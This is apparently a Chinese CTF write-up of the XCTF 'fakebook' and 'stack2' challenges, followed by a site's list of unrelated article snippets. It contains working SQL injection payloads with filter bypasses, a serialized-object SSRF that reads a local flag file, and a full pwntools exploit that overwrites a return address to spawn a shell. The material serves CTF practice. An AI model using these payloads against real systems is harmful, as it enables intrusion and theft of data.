这里强调一点no=1的后面是没有引号的

在4的时候是正常的回显,在5的时候不是,说明列数是4

然后是使用联合查询

1 union select 1,database(),1,1 #

但是页面返回一个no hack

说明应该是被检测到了

应该是union select

所以用++ 或者/**/ 绕过

接着我们爆数据库的名

-1 union select 1,database(),1,1 #

得到数据库的名称是facebook

下面是得到表名

http://220.249.52.133:35346/view.php?no=-1 union/**/select 1,group_concat(table_name),1,1 from information_schema.tables where table_schema='fakebook'#

下面是列名

http://220.249.52.133:35346/view.php?no=-1 union/**/select 1,group_concat(column_name),1,1 from information_schema.columns where table_name='users'#

我们可以得到四个列名:

no
username
passwd
data

接下来获取一些信息

http://220.249.52.133:35346/view.php?no=-1 union/**/select 1,data,1,1 from users#

http://220.249.52.133:35346/view.php?no=2 union++select 1,group_concat(data),3,4 from users

这两句是获取的同一个信息

O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:1;s:4:"blog";s:21:"https://www.baidu.com";}

我们发现了是序列化

结合上面的user.php代码,这里的逻辑应该是:sql查询 -> php序列化 -> 返回结果,这里的curl是应该是没有经过检测的,所以把blog对应的位置替换成我们构造的php序列化串,使用file协议进行ssrf

payload

http://220.249.52.133:35346/view.php?no=2 union++select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}

这个payload的应该no=2

得到

data:text/html;base64,PD9waHANCg0KJGZsYWcgPSAiZmxhZ3tjMWU1NTJmZGY3NzA0OWZhYmY2NTE2OGYyMmY3YWVhYn0iOw0KZXhpdCgwKTsNCg==

base64解密后



$flag = "flag{c1e552fdf77049fabf65168f22f7aeab}";
exit(0);

upload1

直接上传图片抓包分析:

得到一部分的js代码

Array.prototype.contains = function (obj) {  
    var i = this.length;  
    while (i--) {  
        if (this[i] === obj) {  
            return true;  
        }  
    }  
    return false;  
}  

function check(){
upfile = document.getElementById("upfile");
submit = document.getElementById("submit");
name = upfile.value;
ext = name.replace(/^.+\./,'');

if(['jpg','png'].contains(ext)){
	submit.disabled = false;
}else{
	submit.disabled = true;
	alert('è¯·é€‰æ‹©ä¸€å¼ å›¾ç‰‡æ–‡ä»¶ä¸Šä¼ !');
}
}

Web_php_wrong_nginx_config

相关文章地址:

https://blog.csdn.net/hxhxhxhxx/article/details/107907787

RE

PWN

PWN基础知识

[XCTF-pwn]

stack2 writeup

下面是第三届XMan夏令营选拔赛WP的链接地址:
https://www.xctf.org.cn/library/details/8723e039db0164e2f7345a12d2edd2a5e800adf7/

下面这个是一个大佬的文章(写的很详细):
https://muzibing.github.io/2020/06/08/2020.06.08%EF%BC%88123%EF%BC%89/

checksec一下:

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

这里要注意的一个点是开启了栈不可执行和金丝雀保护

这里面有个重要的一点就是上面那个大佬的文章中写的那样由于开启了Canary保护所以溢出的地址并不是直接+4而是需要gdb调试出来的。

下面是EXP:

#coding:utf8
#下面是借鉴的大佬的文章,学习到了许多,大佬的其它文章写的都不错都可以看一下
#https://muzibing.github.io/2020/06/08/2020.06.08%EF%BC%88123%EF%BC%89/

from pwn import *
# context.log_level = 'debug'
 
process_name = './1'
p = process(process_name)
#p = remote('220.249.52.133', 57884)
 
 
hackhere = [0x9b, 0x85, 0x04, 0x08]  #0x0804859B
write_offset = 0x84
system_addr = [0x50, 0x84, 0x04, 0x08] # 0x08048450
sh_addr = [0x87, 0x89, 0x04, 0x08]  # 0x08048987
 
def change_number(offset, value):
	p.sendlineafter('5. exit', '3')
	p.sendlineafter('which number to change:', str(offset))
	p.sendlineafter('new number:', str(value))
 
p.sendlineafter('How many numbers you have:', '1')
p.sendlineafter('Give me your numbers', '1')
for i in range(4):
	change_number(write_offset+i, system_addr[i])
 
write_offset += 8
for i in range(4):
	change_number(write_offset+i, sh_addr[i])
 
p.sendlineafter('5. exit', '5')
p.interactive()

MISC

你可能感兴趣的:(CTF比赛)

  • 勇士赢了,我把掌声给了骑士 复角度的生活
    今天,不参加高考,只看NBA总决赛第三场的较量。这么说有点得罪高考生了,不过我没有当他们面秀,也没有跑到考点外面得瑟,所以我内心毫无波澜。毫无疑问,考场里不乏骑士和勇士球迷,在紧张作答语文考卷同时还心系着球队,不过我希望今天的比赛不会让你们有所分心,毕竟高考不会像比赛录像那样可以再来。今天,好像起来赶考一样,我起得很早,然而事实是睡不着,挺郁闷的,又不是我高考,我紧张什么?九点我并没有准时打开浏览
  • ARM驱动学习之4小结 JT灬新一 嵌入式C++arm开发学习linux
    ARM驱动学习之4小结#include#include#include#include#include#defineDEVICE_NAME"hello_ctl123"MODULE_LICENSE("DualBSD/GPL");MODULE_AUTHOR("TOPEET");staticlonghello_ioctl(structfile*file,unsignedintcmd,unsignedlo
  • 《Python数据分析实战终极指南》 xjt921122 python数据分析开发语言
    对于分析师来说,大家在学习Python数据分析的路上,多多少少都遇到过很多大坑**,有关于技能和思维的**:Excel已经没办法处理现有的数据量了,应该学Python吗?找了一大堆Python和Pandas的资料来学习,为什么自己动手就懵了?跟着比赛类公开数据分析案例练了很久,为什么当自己面对数据需求还是只会数据处理而没有分析思路?学了对比、细分、聚类分析,也会用PEST、波特五力这类分析法,为啥
  • react-intl——react国际化使用方案 苹果酱0567 面试题汇总与解析java开发语言中间件springboot后端
    国际化介绍i18n:internationalization国家化简称,首字母+首尾字母间隔的字母个数+尾字母,类似的还有k8s(Kubernetes)React-intl是React中最受欢迎的库。使用步骤安装#usenpmnpminstallreact-intl-D#useyarn项目入口文件配置//index.tsximportReactfrom"react";importReactDOMf
  • Linux CTF逆向入门 蚁景网络安全 linux运维CTF
    1.ELF格式我们先来看看ELF文件头,如果想详细了解,可以查看ELF的manpage文档。关于ELF更详细的说明:e_shoff:节头表的文件偏移量(字节)。如果文件没有节头表,则此成员值为零。sh_offset:表示了该section(节)离开文件头部位置的距离+-------------------+|ELFheader|---++--------->+-------------------
  • 2022-11-25 疫情卷土而来 快乐微笑每一天
    原计划本周因比赛休息两天半,结果一个阳性患者疫情转变了所有,轮休课表换掉,继续周五上课;比赛顺延,假期顺延,相对应确诊病例所在区域封闭。这疫情何时是一个尽头,谁也无法知晓,唯有进出带好口罩,保护自己,方能战胜疫情。疫情无情,人间温暖,期待疫情早日过去,大地重返平安和谐。
  • 稍微落后的人更容易被激励成长 有杕之杜
    今日纯分享。图片发自App沃顿商学院市场营销学教授乔纳·伯杰在接受《哈佛商业评论》采访时,介绍了他的一项研究。伯杰教授告诉参加实验的人,他们在跟隔壁房间的另一个人比赛打字速度,获胜的人有金钱奖励。一轮比赛之后,伯杰给了这些人不同的反馈,有的人被告知远远落后竞争对手,有的人被告知稍稍落后,还有的人被告知不相上下或者略微领先。结果只有那些被告知“稍微落后”的人,在第二轮中速度明显提高,而且总体来说,这
  • Windows安装ciphey编码工具,附一道ciscn编码题例 im-Miclelson CTF工具网络安全
    TA是什么一款智能化的编码分析解码工具,对于CTF中复杂性编码类题目可以快速攻破。编码自动分析解码的神器。如何安装Windows环境Python3.864位(最新的版本不兼容,32位的也不行)PIP直接安装pipinstallciphey-ihttps://pypi.mirrors.ustc.edu.cn/simple/安装后若是出现报错请根据错误代码行数找到对应文件,r修改成rb即可。使用标准语
  • 向着明亮那方12.7 向着明亮那方的我们
    【水晶泥的妙用】在地上捡到一滩水晶泥,本想扔进垃圾桶,发现水晶泥上附着了些许蓝色钢笔墨水。我脑洞大开,水晶泥可不可以用来处理钢笔墨渍呢?正好垃圾桶那面瓷砖墙上有蓝色钢笔水痕迹,我用水晶泥沾了沾墨迹,很轻易地把墨色粘了下来,好干净。【长跑报名】我让同学们自愿报名参加冬季长跑比赛,课间将名字报给班长。班长把名字统计在本子上,把本子拿来给我看:“老师,我晚上回去给你做张电子表,发给你。”看来班长又学了新
  • 2005年高考英语北京卷 - 阅读理解C 让文字更美
    Howcouldwepossiblythinkthatkeepinganimalsincagesinunnaturalenvironments-mostlyforentertainmentpurposes-isfairandrespectful?我们怎么可能认为把动物关在非自然环境的笼子里——主要是为了娱乐目的——是公平和尊重的呢?Zooofficialssaytheyareconcernedab
  • 全运会结束了除了闭幕式无亮点外对西安发展大有裨益 新心芯达人
    前言昨天是最后一个比赛日,山东代表团单日揽4金,最后以58金55银47铜,总计160枚奖牌的成绩位列奖牌榜第一的位置,这已经是山东连续第四届全运会取得奖牌榜第一的成绩,以绝对的优势达成了四连冠成就,山东属实厉害!广东在本届全运会中也拼尽了全力,在26号的最后一个比赛日,狂揽6金,最后以54金,32银,56铜,总计142枚奖牌位列奖牌榜第二的位置,虽然最后一个比赛日爆发连夺6金,最后还是没有撼动山东
  • 72称体重 作者:陈瑄仪 家庭教育CEO
    2019年5月1日星期三大雨昭阳区今天我们开始准备明天的比赛,教练说早上8:00叫我们到市委党校集合,爸爸很早就送我到市委党校了,我在那里等了好久,教练还没来,我就在那里跑步,跑了十几圈教练还没有来又跑几圈教练还没来,我们就觉得奇怪了,教练不会在家里睡懒觉吧,我们又跑了几圈才休息。等教练来了我们就去称重体重,第一次称,没过,我急了,教练说我超了0.3公斤,让我去跑了几圈重量才减下来,明明之前几天只
  • CTF-bugku-crypto-[7+1+0]-base64解码之后做偏移 沧海一粟日尽其用 算法安全python
    CTF-bugku-crypto-[7+1+0]-base64解码之后做偏移1.题目2.解题思路2.1base64编码原理2.2解题思路2.2.1base64解码找规律2.2.2破解思路3.解题脚本4.flag5.附EASCII码表1.题目提示信息:7+1+0?格式bugku{xxxxx}密文:4nXna/V7t2LpdLI44mn0fQ==要求:破解密文获得flag2.解题思路2.1base64
  • 2019-11-29晨间日记 麦新
    今天是什么日子起床:6:00就寝:23:30天气:晴朗心情:平静纪念日:第二场比赛叫我起床的不是闹钟是梦想年度目标及关键点:国考考研本月重要成果:学习今日三只青蛙/番茄钟点评作业出镜点评夜班成功日志-记录三五件有收获的事务出镜点评点评作业夜班财务检视-1人际的投入来回跑~开卷有益-学习/读书/听书《孔子》健康与饮食今日步数:8000+好习惯打卡早晚打卡阅读打卡听书打卡社群打卡
  • 特雷-杨表现出色,比肩詹姆斯,库里 Allen196
    特雷-杨得到35分11次助攻。从2000年以后只有两个新秀可以打出这样的数据(至少35分,10次助攻),他们的名字是:史蒂芬-库里,勒布朗-詹姆斯。现在亚特兰大老鹰队的特雷-杨加入了他们的行列,在对阵克里夫兰骑士队的比赛中,他拿到了35分,11次助攻帮助老鹰队取得胜利,同时也是老鹰队主教练罗伊德-皮尔斯作为NBA主教练的首场胜利。揭幕战战胜尼克斯,第二场战胜防守强硬的灰熊后,杨再次帮助球队战胜了骑
  • D15 论语学习笔记 许小兔Angelina
    悟:上级对下级的宽容:凡事成定局,就不你说了;已接近完结的事,也没必要匡正和挽回了;既然是过去的事,也没必要追究得失和责任了。对待孩子教育也是,不用“问责制”,这样容易让孩子因为害怕担责而说谎。应当循循善诱,避免再犯错才是最重要的。3.16:【原文】子曰:“射不主皮,为力不同科,古之道也。”【译文】孔子说:“射箭比赛不以射透为主,而主要看是否射得准确,因为人的力量不同,自古如此。”3.17:【原文
  • CTF常见编码及加解密(超全)第二篇 不会代码的小徐 编码密码网络安全密码学预编码
    HTML实体编码简述:字符实体是用一个编号写入HTML代码中来代替一个字符,在使用浏览器访问网页时会将这个编号解析还原为字符以供阅读。举例:highlighter-HTML明文:hello,world.十进制:hello,world.十六进制:hel
  • 中国男篮:15万赛后评分,赵继伟第三,赵睿3.8分倒数第一 体娱荒原
    在某体育社交软件中,有15万人之多为中国男篮第二场比赛进行点评,我们一起来看看他们的评分排名。这场比赛有12人出场,全部球员都有得分进账。吴前9.9分,这场比赛他拿到全队最高的18分还有4篮板3助攻3抢断,虽然也有3次失误和5次犯规,但是瑕不掩瑜,特别是最后一节单节得到10分跟赵继伟的连线帮助球队逆转对手赢得一场胜利,他的发挥至关重要,要知道对手对他也有研究,基本上都是贴身防守,持球还有夹击,吴前
  • 平昌冬奥,人生竞赛不要给对手和裁判任何机会 小猫_003e
    如火如荼的平昌冬奥会拉下了帷幕,但是自从某年的伦敦奥运会之后,我们中国队自从好像就“最爱干犯规的事儿”。2月20日,短道速滑女子3000米接力赛,可以说是相当令人痛心了。比赛中,韩国队交接棒失误“扑街”,阻拦了加拿大队,带来的连锁反应也影响了中国队。中国队以微弱劣势落后韩国队,第二个冲线!韩国队这次失误犯规那么明显,应该唱费玉清的我送你离开千里之外。但···最终赛场上裁判宣布:韩国队冠军,中国队、
  • 周记15 安诗雨
    星期天回学校的时候,发现寝室里有好几只臭屁虫。星期一的电学很难,数学也非常难,让我感到非常吃力。历史比赛日期就在11月29日,也就是我的生日。唉,过生日去比赛,我好难受。不仅如此,还是高手对决……老师希望“保三争二冲一”,我也希望来一个一等奖,这样多光荣,也证明了自己的实力。不管怎么样,要全力以赴。星期二我们进行了电子技能实训期中考试。对我来说,简直不要太轻松。无非就是拿万用表测电阻值,顺带读出来
  • 【足坛简讯】9月2日足坛简讯及比赛预告 神州足球
    【足坛简讯】9月2日足坛简讯及比赛预告9月2日足坛简讯与比赛预告比赛结果✍️意甲第3轮:十人米兰2-1罗马三连胜领跑莱奥凌空斩吉鲁点射托莫里染红✍️德甲第3轮:两连平!多特连丢两球2-2遭升班马海登海姆扳平布兰特凌空斩✍️沙特联:米特洛维奇戴帽本泽马破门新月连入三球4-3逆转吉达联合✍️热身赛:中国国奥1-0土库曼斯坦国奥,艾菲尔丁制胜球国内足坛✍️明日之星足球赛:上海队点球憾负曼城,大阪樱花蔚山
  • 都2024年了,还在问网络安全怎么入门,气得我当场脑血栓发作 网安大师兄 web安全网络安全网络安全学习
    前言本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。正题首先,在准备进入这个行业之前,我们要问一下我们的内心,工作千千万,为什么要想进入这个行业?相信每个人的答案都不一样,有的人会说,这个行业整体上比其他行业赚钱多,有的人会说特别喜欢技术,想钻研一
  • 第十二章〈一〉 汝此一生1985
    接下来的运动会时光便是和东美一起度过。两人时不时就去超市买上一大袋东西,提着一大袋东西然后坐在操场上看着比赛消磨时光。下午两三点时刻,太阳很大,笼罩了整个操场,晒得人只想睡觉。秦嘉杨在篮球场挥洒热汗,东美躺在林召航腿上和林召航一起听着歌。拒绝去看秦嘉杨比赛,“我可不想看见他和他那个情人的亲密互动。”说着忿忿填进嘴里一个薯片。林召航拔下耳机,“哪来的情人?”东美:“姓篮名球”东美的嘴巴变成了“0”形
  • Dev-C++头文件小Bug 蒟蒻pzjdsg666 bugc语言c++
    Dev-C++应该是大家最常用的C++软件了吧,但它有几个小Bug。1、“万能头”众所周知,“万能头”在官方比赛中不能使用(你要用没人拦着你~呵呵),但在Dev-C++可以使用。所以,我们可以省掉好多头文件!如下:#includeusingnamespacestd;2、C语言头文件在Dev-C++中,你竟然可以使用C语言头文件(惊不惊喜~意不意外~)如下:#include3、iostream竟然包
  • 跃迁第一天 师者之写道
    《跃迁》你怎么也想不到火车在替代马车的时候,很多人嘲笑火车,甚至夸张地和火车比赛,直到今天,马车被淘汰了,更别说有能赶上马车的火车了!时代在发展,我们稍微不学习,不改变就可能永远地被淘汰在世界的某一个角落里。今天我用拆书法拆了我自己。
  • CTF——web方向学习攻略 一则孤庸 CTF网络安全CTF
    1计算机基础操作系统:熟悉Linux命令,方便使用Kali。网络技术:HCNA、CCNA。编程能力:拔高项,有更好。2web应用HTTP协议:必须掌握web开发框架web安全测试3数据库数据库基本操作SQL语句数据库优化4刷题
  • 周二竞足:塞维利亚力争小胜巴萨,亚特兰大击败热那亚如探囊取物 阿东侃球
    昨日赛事回顾:富勒姆对阵谢菲尔德联这场很简单,整体方向是正确的,但是谢菲联在开局3分钟进了1个球后,富勒姆竟然没能追平,全场就只有这1个进球,有点可惜。莱万特和巴伦西亚这一场比赛简直就是折磨人,上半场莱万特2-1领先,下半场却被反攻最终3-4结束,硬生生的打出了胜负的战果,着实惊到了我。周二003意甲:热那亚VS亚特兰大比赛时间:2021-12-2203:45基本面分析:热那亚联赛1胜7平10负积
  • 当姨妈遇见马拉松赛事,该怎么破 语非年
    图片发自App凌晨4:30分匆匆洗漱出门,到5:10分集合点与团长、许总车自驾前往参赛地(漳州市华安县),车上听说参赛点大雨倾盆,本来就有心无意参赛的(没雨就跑,有雨弃赛),果不其然在进入华安县的时候就遇瓢泼大雨,于是与如风大神们说笑着,若到起跑点还是这般大雨就弃赛。因都身体抱恙。所幸,天工不负有心人,到达目的地存包直到开跑,雨奇迹般的停了。临近比赛的前三天正好生理期,在纠结去还是不去的时候,内心
  • CTF——web总结 oliveira-time ctfweb安全
    解题思路做题先看源码关注可下载的资源(zip压缩包)抓包寻找可能存在的加密信息(base64)不管三七二十一先扫描目录再说ps:正常的应该是先扫描目录,然后发现后台进行爆破,发现爆破困难,然后去社工找其他信息。CTF——web个人总结_ctfweb-CSDN博客
  • VueTreeselect el-tree-select 多选 小小并不小 Vueelementjsvue.jsjavascript
    1、VueTreeselect是一个多选组件npminstall--save@riophae/vue-treeselect全部代码//importthecomponentimportTreeselectfrom'@riophae/vue-treeselect'//importthestylesimport'@riophae/vue-treeselect/dist/vue-treeselect.cs
  • knob UI插件使用 换个号韩国红果果 JavaScriptjsonpknob
    图形是用canvas绘制的 js代码 var paras = { max:800, min:100, skin:'tron',//button type thickness:.3,//button width width:'200',//define canvas width.,canvas height displayInput:'tr
  • Android+Jquery Mobile学习系列(5)-SQLite数据库 白糖_ JQuery Mobile
    目录导航   SQLite是轻量级的、嵌入式的、关系型数据库,目前已经在iPhone、Android等手机系统中使用,SQLite可移植性好,很容易使用,很小,高效而且可靠。   因为Android已经集成了SQLite,所以开发人员无需引入任何JAR包,而且Android也针对SQLite封装了专属的API,调用起来非常快捷方便。   我也是第一次接触S
  • impala-2.1.2-CDH5.3.2 dayutianfei impala
    最近在整理impala编译的东西,简单记录几个要点: 根据官网的信息(https://github.com/cloudera/Impala/wiki/How-to-build-Impala): 1. 首次编译impala,推荐使用命令: ${IMPALA_HOME}/buildall.sh -skiptests -build_shared_libs -format 2.仅编译BE ${I
  • 求二进制数中1的个数 周凡杨 java算法二进制
    解法一: 对于一个正整数如果是偶数,该数的二进制数的最后一位是 0 ,反之若是奇数,则该数的二进制数的最后一位是 1 。因此,可以考虑利用位移、判断奇偶来实现。   public int bitCount(int x){ int count = 0; while(x!=0){ if(x%2!=0){ /
  • spring中hibernate及事务配置 g21121 Hibernate
    hibernate的sessionFactory配置: <!-- hibernate sessionFactory配置 --> <bean id="sessionFactory" class="org.springframework.orm.hibernate3.LocalSessionFactoryBean"> <
  • log4j.properties 使用 510888780 log4j
    log4j.properties 使用 一.参数意义说明 输出级别的种类 ERROR、WARN、INFO、DEBUG ERROR 为严重错误 主要是程序的错误 WARN 为一般警告,比如session丢失 INFO 为一般要显示的信息,比如登录登出 DEBUG 为程序的调试信息 配置日志信息输出目的地 log4j.appender.appenderName = fully.qua
  • Spring mvc-jfreeChart柱图(2) 布衣凌宇 jfreechart
    上一篇中生成的图是静态的,这篇将按条件进行搜索,并统计成图表,左面为统计图,右面显示搜索出的结果。 第一步:导包 第二步;配置web.xml(上一篇有代码) 建BarRenderer类用于柱子颜色 import java.awt.Color; import java.awt.Paint; import org.jfree.chart.renderer.category.BarR
  • 我的spring学习笔记14-容器扩展点之PropertyPlaceholderConfigurer aijuans Spring3
    PropertyPlaceholderConfigurer是个bean工厂后置处理器的实现,也就是BeanFactoryPostProcessor接口的一个实现。关于BeanFactoryPostProcessor和BeanPostProcessor类似。我会在其他地方介绍。 PropertyPlaceholderConfigurer可以将上下文(配置文件)中的属性值放在另一个单独的标准java
  • maven 之 cobertura 简单使用 antlove maventestunitcoberturareport
    1. 创建一个maven项目 2. 创建com.CoberturaStart.java package com; public class CoberturaStart { public void helloEveryone(){ System.out.println("=================================================
  • 程序的执行顺序 百合不是茶 JAVA执行顺序
          刚在看java核心技术时发现对java的执行顺序不是很明白了,百度一下也没有找到适合自己的资料,所以就简单的回顾一下吧   代码如下;     经典的程序执行面试题 //关于程序执行的顺序 //例如: //定义一个基类 public class A(){ public A(
  • 设置session失效的几种方法 bijian1013 web.xmlsession失效监听器
    在系统登录后,都会设置一个当前session失效的时间,以确保在用户长时间不与服务器交互,自动退出登录,销毁session。具体设置很简单,方法有三种:(1)在主页面或者公共页面中加入:session.setMaxInactiveInterval(900);参数900单位是秒,即在没有活动15分钟后,session将失效。这里要注意这个session设置的时间是根据服务器来计算的,而不是客户端。所
  • java jvm常用命令工具 bijian1013 javajvm
    一.概述         程序运行中经常会遇到各种问题,定位问题时通常需要综合各种信息,如系统日志、堆dump文件、线程dump文件、GC日志等。通过虚拟机监控和诊断工具可以帮忙我们快速获取、分析需要的数据,进而提高问题解决速度。 本文将介绍虚拟机常用监控和问题诊断命令工具的使用方法,主要包含以下工具:       &nbs
  • 【Spring框架一】Spring常用注解之Autowired和Resource注解 bit1129 Spring常用注解
    Spring自从2.0引入注解的方式取代XML配置的方式来做IOC之后,对Spring一些常用注解的含义行为一直处于比较模糊的状态,写几篇总结下Spring常用的注解。本篇包含的注解有如下几个: Autowired Resource Component Service Controller Transactional 根据它们的功能、目的,可以分为三组,Autow
  • mysql 操作遇到safe update mode问题 bitray update
        我并不知道出现这个问题的实际原理,只是通过其他朋友的博客,文章得知的一个解决方案,目前先记录一个解决方法,未来要是真了解以后,还会继续补全.     在mysql5中有一个safe update mode,这个模式让sql操作更加安全,据说要求有where条件,防止全表更新操作.如果必须要进行全表操作,我们可以执行 SET
  • nginx_perl试用 ronin47 nginx_perl试用
    因为空闲时间比较多,所以在CPAN上乱翻,看到了nginx_perl这个项目(原名Nginx::Engine),现在托管在github.com上。地址见:https://github.com/zzzcpan/nginx-perl 这个模块的目的,是在nginx内置官方perl模块的基础上,实现一系列异步非阻塞的api。用connector/writer/reader完成类似proxy的功能(这里
  • java-63-在字符串中删除特定的字符 bylijinnan java
    public class DeleteSpecificChars { /** * Q 63 在字符串中删除特定的字符 * 输入两个字符串,从第一字符串中删除第二个字符串中所有的字符。 * 例如,输入”They are students.”和”aeiou”,则删除之后的第一个字符串变成”Thy r stdnts.” */ public static voi
  • EffectiveJava--创建和销毁对象 ccii 创建和销毁对象
    本章内容: 1. 考虑用静态工厂方法代替构造器 2. 遇到多个构造器参数时要考虑用构建器(Builder模式) 3. 用私有构造器或者枚举类型强化Singleton属性 4. 通过私有构造器强化不可实例化的能力 5. 避免创建不必要的对象 6. 消除过期的对象引用 7. 避免使用终结方法 1. 考虑用静态工厂方法代替构造器     类可以通过
  • [宇宙时代]四边形理论与光速飞行 comsci
       从四边形理论来推论 为什么光子飞船必须获得星光信号才能够进行光速飞行?    一组星体组成星座  向空间辐射一组由复杂星光信号组成的辐射频带,按照四边形-频率假说  一组频率就代表一个时空的入口    那么这种由星光信号组成的辐射频带就代表由这些星体所控制的时空通道,该时空通道在三维空间的投影是一
  • ubuntu server下python脚本迁移数据 cywhoyi pythonKettlepymysqlcx_Oracleubuntu server
    因为是在Ubuntu下,所以安装python、pip、pymysql等都极其方便,sudo apt-get install pymysql, 但是在安装cx_Oracle(连接oracle的模块)出现许多问题,查阅相关资料,发现这边文章能够帮我解决,希望大家少走点弯路。http://www.tbdazhe.com/archives/602 1.安装python 2.安装pip、pymysql
  • Ajax正确但是请求不到值解决方案 dashuaifu Ajaxasync
    Ajax正确但是请求不到值解决方案   解决方案:1 .     async: false ,    2.     设置延时执行js里的ajax或者延时后台java方法!!!!!!!   例如:   $.ajax({     &
  • windows安装配置php+memcached dcj3sjt126com PHPInstallmemcache
    Windows下Memcached的安装配置方法 1、将第一个包解压放某个盘下面,比如在c:\memcached。 2、在终端(也即cmd命令界面)下输入 'c:\memcached\memcached.exe -d install' 安装。 3、再输入: 'c:\memcached\memcached.exe -d start' 启动。(需要注意的: 以后memcached将作为windo
  • iOS开发学习路径的一些建议 dcj3sjt126com ios
    iOS论坛里有朋友要求回答帖子,帖子的标题是: 想学IOS开发高阶一点的东西,从何开始,然后我吧啦吧啦回答写了很多。既然敲了那么多字,我就把我写的回复也贴到博客里来分享,希望能对大家有帮助。欢迎大家也到帖子里讨论和分享,地址:http://bbs.csdn.net/topics/390920759   下面是我回复的内容:   结合自己情况聊下iOS学习建议,
  • Javascript闭包概念 fanfanlovey JavaScript闭包
    1.参考资料 http://www.jb51.net/article/24101.htm http://blog.csdn.net/yn49782026/article/details/8549462 2.内容概述 要理解闭包,首先需要理解变量作用域问题 内部函数可以饮用外面全局变量 var n=999;   functio
  • yum安装mysql5.6 haisheng mysql
    1、安装http://dev.mysql.com/get/mysql-community-release-el7-5.noarch.rpm   2、yum install mysql   3、yum install mysql-server   4、vi /etc/my.cnf   添加character_set_server=utf8
  • po/bo/vo/dao/pojo的详介 IT_zhlp80 javaBOVODAOPOJOpo
        JAVA几种对象的解释 PO:persistant object持久对象,可以看成是与数据库中的表相映射的java对象。最简单的PO就是对应数据库中某个表中的一条记录,多个记录可以用PO的集合。PO中应该不包含任何对数据库的操作. VO:value object值对象。通常用于业务层之间的数据传递,和PO一样也是仅仅包含数据而已。但应是抽象出的业务对象,可
  • java设计模式 kerryg java设计模式
    设计模式的分类:    一、 设计模式总体分为三大类: 1、创建型模式(5种):工厂方法模式,抽象工厂模式,单例模式,建造者模式,原型模式。 2、结构型模式(7种):适配器模式,装饰器模式,代理模式,外观模式,桥接模式,组合模式,享元模式。 3、行为型模式(11种):策略模式,模版方法模式,观察者模式,迭代子模式,责任链模式,命令模式,备忘录模式,状态模式,访问者
  • [1]CXF3.1整合Spring开发webservice——helloworld篇 木头.java springwebserviceCXF
    Spring 版本3.2.10 CXF 版本3.1.1 项目采用MAVEN组织依赖jar 我这里是有parent的pom,为了简洁明了,我直接把所有的依赖都列一起了,所以都没version,反正上面已经写了版本 <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="ht
  • Google 工程师亲授:菜鸟开发者一定要投资的十大目标 qindongliang1922 工作感悟人生
    身为软件开发者,有什么是一定得投资的? Google 软件工程师 Emanuel Saringan 整理了十项他认为必要的投资,第一项就是身体健康,英文与数学也都是必备能力吗?来看看他怎么说。(以下文字以作者第一人称撰写)) 你的健康 无疑地,软件开发者是世界上最久坐不动的职业之一。 每天连坐八到十六小时,休息时间只有一点点,绝对会让你的鲔鱼肚肆无忌惮的生长。肥胖容易扩大罹患其他疾病的风险,
  • linux打开最大文件数量1,048,576 tianzhihehe clinux
    File descriptors are represented by the C int type. Not using a special type is often  considered odd, but is, historically, the Unix way. Each Linux process has a maximum number of files th
  • java语言中PO、VO、DAO、BO、POJO几种对象的解释 衞酆夼 javaVOBOPOJOpo
    PO:persistant object持久对象 最形象的理解就是一个PO就是数据库中的一条记录。好处是可以把一条记录作为一个对象处理,可以方便的转为其它对象。可以看成是与数据库中的表相映射的java对象。最简单的PO就是对应数据库中某个表中的一条记录,多个记录可以用PO的集合。PO中应该不包含任何对数据库的操作。 BO:business object业务对象 封装业务逻辑的java对象
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他